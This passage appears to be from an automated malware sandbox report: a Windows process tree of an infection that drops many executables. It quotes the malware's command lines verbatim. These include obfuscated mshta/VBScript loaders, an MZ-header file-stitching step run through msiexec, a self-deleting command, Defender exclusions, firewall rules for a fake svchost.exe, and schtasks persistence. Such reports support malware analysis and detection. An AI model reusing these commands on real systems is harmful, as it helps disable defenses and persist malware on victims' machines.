                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                      4⤵
                                      • Checks computer location settings
                                      • Suspicious use of FindShellTrayWindow
                                      PID:6552
                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffc0c1bdec0,0x7ffc0c1bded0,0x7ffc0c1bdee0
                                        5⤵
                                          PID:6628
                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1696 /prefetch:8
                                          5⤵
                                            PID:6788
                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:2
                                            5⤵
                                              PID:6780
                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1984 /prefetch:8
                                              5⤵
                                                PID:6820
                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2512 /prefetch:1
                                                5⤵
                                                • Checks computer location settings
                                                PID:6948
                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2572 /prefetch:1
                                                5⤵
                                                • Checks computer location settings
                                                PID:6988
                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2964 /prefetch:2
                                                5⤵
                                                  PID:5148
                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1652 /prefetch:8
                                                  5⤵
                                                    PID:6196
                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3416 /prefetch:8
                                                    5⤵
                                                      PID:6328
                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=2660 /prefetch:8
                                                      5⤵
                                                        PID:3200
                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3332 /prefetch:8
                                                        5⤵
                                                          PID:6356
                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3536 /prefetch:8
                                                          5⤵
                                                            PID:5148
                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=2652 /prefetch:8
                                                            5⤵
                                                              PID:6840
                                                      • C:\Users\Admin\Pictures\Adobe Films\n6LyyW6Y130rISPizyLnNBN_.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\n6LyyW6Y130rISPizyLnNBN_.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3276
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                          3⤵
                                                            PID:1612
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im chrome.exe
                                                              4⤵
                                                              • Kills process with taskkill
                                                              PID:5000
                                                        • C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:3196
                                                          • C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Accesses Microsoft Outlook accounts
                                                            • Accesses Microsoft Outlook profiles
                                                            PID:3240
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"
                                                              4⤵
                                                                PID:2284
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /T 10 /NOBREAK
                                                                  5⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:3056
                                                          • C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:4488
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                              3⤵
                                                                PID:1196
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe" ) do taskkill -im "%~NxK" -F
                                                                  4⤵
                                                                    PID:2852
                                                                    • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                      8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:3932
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                        6⤵
                                                                          PID:4476
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                            7⤵
                                                                              PID:4104
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                            6⤵
                                                                              PID:1808
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                7⤵
                                                                                  PID:3512
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                    8⤵
                                                                                      PID:1204
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                      8⤵
                                                                                        PID:2972
                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                        msiexec.exe -y .\N3V4H8H.SXY
                                                                                        8⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:1436
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill -im "Ul6PF7ORyqCzK3rFPRAWHREO.exe" -F
                                                                                  5⤵
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4832
                                                                          • C:\Users\Admin\Pictures\Adobe Films\exJBBJ57RhMwfX6V7rNCirtY.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\exJBBJ57RhMwfX6V7rNCirtY.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Checks BIOS information in registry
                                                                            • Identifies Wine through registry keys
                                                                            • Adds Run key to start application
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Drops file in Windows directory
                                                                            PID:640
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nyj61S0T9w.bat"
                                                                              3⤵
                                                                                PID:972
                                                                                • C:\Windows\SysWOW64\w32tm.exe
                                                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                  4⤵
                                                                                    PID:3048
                                                                                    • C:\Windows\System32\w32tm.exe
                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                      5⤵
                                                                                        PID:3836
                                                                                    • C:\Recovery\WindowsRE\ShellExperienceHost.exe
                                                                                      "C:\Recovery\WindowsRE\ShellExperienceHost.exe"
                                                                                      4⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Identifies Wine through registry keys
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                      PID:4456
                                                                                • C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4972
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4256
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3816
                                                                                • C:\Users\Admin\Pictures\Adobe Films\1hlySlP9nisX71mJnP5mZ3Qa.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\1hlySlP9nisX71mJnP5mZ3Qa.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  PID:2176
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:4244
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                    3⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2112
                                                                                • C:\Users\Admin\Pictures\Adobe Films\kMqKKP_wvgeIt3GAmkhy0_7l.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\kMqKKP_wvgeIt3GAmkhy0_7l.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:4632
                                                                                • C:\Users\Admin\Pictures\Adobe Films\EWVAtHTOXdt0DAYRA3GEQBur.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\EWVAtHTOXdt0DAYRA3GEQBur.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:300
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 656
                                                                                    3⤵
                                                                                    • Program crash
                                                                                    PID:2620
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 668
                                                                                    3⤵
                                                                                    • Program crash
                                                                                    PID:3640
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 672
                                                                                    3⤵
                                                                                    • Program crash
                                                                                    PID:4872
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 812
                                                                                    3⤵
                                                                                    • Program crash
                                                                                    PID:3256
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 1048
                                                                                    3⤵
                                                                                    • Program crash
                                                                                    PID:3136
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 1140
                                                                                    3⤵
                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                    • Program crash
                                                                                    PID:4092
                                                                                • C:\Users\Admin\Pictures\Adobe Films\ZuWzpISe9wfUgG8mQ9ORonH1.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\ZuWzpISe9wfUgG8mQ9ORonH1.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  PID:1060
                                                                                • C:\Users\Admin\Pictures\Adobe Films\YLPxR1bFWYWLGzK0QEMH4Yaa.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\YLPxR1bFWYWLGzK0QEMH4Yaa.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks BIOS information in registry
                                                                                  • Checks whether UAC is enabled
                                                                                  • Drops file in Windows directory
                                                                                  PID:592
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                    3⤵
                                                                                      PID:1508
                                                                                    • C:\Windows\System32\netsh.exe
                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                      3⤵
                                                                                        PID:1744
                                                                                      • C:\Windows\System32\netsh.exe
                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                        3⤵
                                                                                          PID:4700
                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                          schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                          3⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:5720
                                                                                        • C:\Windows\System\svchost.exe
                                                                                          "C:\Windows\System\svchost.exe" formal
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Drops file in Windows directory
                                                                                          PID:5768
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                            4⤵
                                                                                              PID:5360
                                                                                            • C:\Windows\System32\netsh.exe
                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                              4⤵
                                                                                                PID:2748
                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                4⤵
                                                                                                  PID:5024
                                                                                          • C:\Users\Admin\AppData\Local\Temp\EF78.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\EF78.exe
                                                                                            1⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:2496
                                                                                            • C:\Users\Admin\AppData\Local\Temp\EF78.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\EF78.exe
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:344
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Creates scheduled task(s)
                                                                                            PID:1536
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "_eKJw2OFuLijigALN0RShv0q" /sc ONLOGON /tr "'C:\Windows\Tasks\_eKJw2OFuLijigALN0RShv0q.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Creates scheduled task(s)
                                                                                            PID:2192
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "RqcBdtquQCGLaKIMXJSNd_ZL" /sc ONLOGON /tr "'C:\odt\RqcBdtquQCGLaKIMXJSNd_ZL.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Creates scheduled task(s)
                                                                                            PID:2372
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4052
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "9NDwiPlZEEhDGlkz9gl0UQAX" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU\9NDwiPlZEEhDGlkz9gl0UQAX.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Creates scheduled task(s)
                                                                                            PID:2300
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Creates scheduled task(s)
                                                                                            PID:896
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4484
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /f
                                                                                            1⤵
                                                                                            • Process spawned unexpected child process
                                                                                            • Creates scheduled task(s)
                                                                                            PID:1828
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                            1⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Modifies Internet Explorer settings
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:968
                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                            1⤵
                                                                                            • Modifies Internet Explorer settings
                                                                                            PID:3644
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:3512
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Modifies Internet Explorer settings
                                                                                            • Modifies registry class
                                                                                            PID:4656
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:5072
                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
